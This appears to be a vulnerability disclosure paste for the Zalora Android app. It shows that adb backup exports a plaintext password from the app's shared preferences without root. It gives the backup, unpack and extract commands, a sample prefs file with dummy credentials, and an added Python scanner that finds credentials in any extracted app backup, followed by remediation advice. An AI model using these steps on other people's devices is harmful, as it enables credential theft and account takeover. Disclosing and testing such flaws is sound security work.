Zalora

Posted by a guest, Apr 21st, 2019
#Application: Zalora
#Platform: Android
#Version: 6.15.1 (latest)
#Severity: Medium
#Impact: A non-root user can read the password in clear text and log in to the application.

POC:

1. Back up the application data to the local PC. No root is needed: adb backup exports the app's private data as long as the app does not set android:allowBackup="false" in its manifest (the default is true); the device only asks the user to tap "Back up my data".
adb backup -f ~/zalora.ab -noapk com.zalora.android

2. Convert "zalora.ab" into a tar file (it contains the backup data of com.zalora.android) with Android Backup Extractor. The trailing "" is the backup password, empty because none was set in step 1.
java -jar abe.jar unpack ~/zalora.ab zalora.tar ""

3. Extract the tar file.
tar -xvf zalora.tar

4. After extraction, inspect the data in the directory apps/com.zalora.android/

5. Look for sensitive data. The password is stored in plain text in the app's shared preferences file login_data.xml (the app's on-device /shared_prefs/ directory, which the extracted backup places under apps/com.zalora.android/sp/). The value is a JSON object with the quotes XML-escaped as &quot;:

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
</map>
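The following scanner is an added example and is not part of the original report. It automates step 5 over the directory that step 3 produces: it walks every shared-preferences XML file, lets the XML parser undo the &quot; escaping, tries to decode each string value as JSON, and flags any key whose name looks like a credential. The embedded login_data.xml is constructed to mirror the file above (the extra boolean entry is invented filler), and the list of "sensitive" key names is an assumption, not something the report states.

```python
"""Scan extracted adb-backup shared preferences for plaintext credentials.

Added example, not the original report's code. Run against the directory
left behind by `tar -xvf zalora.tar`, e.g. `python scan_prefs.py .`
"""
import json
import os
import re
import sys
import tempfile
import xml.etree.ElementTree as ET

# Heuristic list of key names that commonly hold secrets (assumption, not exhaustive).
SENSITIVE_KEY = re.compile(r"(pass(word|wd)?|pwd|secret|token|session|auth|credential)", re.I)

# Constructed sample mirroring the report's login_data.xml; the boolean is filler.
SAMPLE_LOGIN_DATA = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
    <boolean name="first_run" value="false" />
</map>
"""


def _walk_json(value, path, findings):
    """Recursively flag credential-looking keys inside a decoded JSON value."""
    if isinstance(value, dict):
        for key, val in value.items():
            sub = f"{path}.{key}"
            if SENSITIVE_KEY.search(key) and isinstance(val, (str, int)):
                findings.append((sub, str(val)))
            _walk_json(val, sub, findings)
    elif isinstance(value, list):
        for i, val in enumerate(value):
            _walk_json(val, f"{path}[{i}]", findings)


def scan_prefs_xml(xml_text, label):
    """Return [(location, value)] for credential-looking entries in one prefs file.

    ElementTree unescapes &quot; for us, so the element text is the raw JSON the
    app wrote; a value that is not JSON is still checked by its element name.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root:
        name = elem.get("name", "")
        text = (elem.text or "").strip()
        loc = f"{label}:{name}"
        if SENSITIVE_KEY.search(name) and text:
            findings.append((loc, text))
        try:
            _walk_json(json.loads(text), loc, findings)
        except ValueError:  # not JSON (plain string, empty text, etc.)
            pass
    return findings


def scan_backup_dir(root_dir):
    """Walk an extracted backup and scan every XML file found (prefs live under sp/)."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for fn in sorted(files):
            if not fn.endswith(".xml"):
                continue
            full = os.path.join(dirpath, fn)
            label = os.path.relpath(full, root_dir).replace(os.sep, "/")
            with open(full, encoding="utf-8") as fh:
                try:
                    findings.extend(scan_prefs_xml(fh.read(), label))
                except ET.ParseError:  # skip non-prefs XML such as a manifest
                    pass
    return findings


def demo():
    """Build a throwaway directory laid out like the extracted backup and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        sp_dir = os.path.join(tmp, "apps", "com.zalora.android", "sp")
        os.makedirs(sp_dir)
        with open(os.path.join(sp_dir, "login_data.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_LOGIN_DATA)
        return scan_backup_dir(tmp)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for loc, val in (scan_backup_dir(target) if target else demo()):
        print(f"[!] {loc} = {val}")
```

The same scanner works on any app's backup, since every app's shared preferences are written in this XML format. A finding like the one above means the fix is on the app side: do not persist the password at all (keep a revocable session token instead), protect whatever must be stored with Android Keystore, and set android:allowBackup="false" so adb backup cannot export the app's private data.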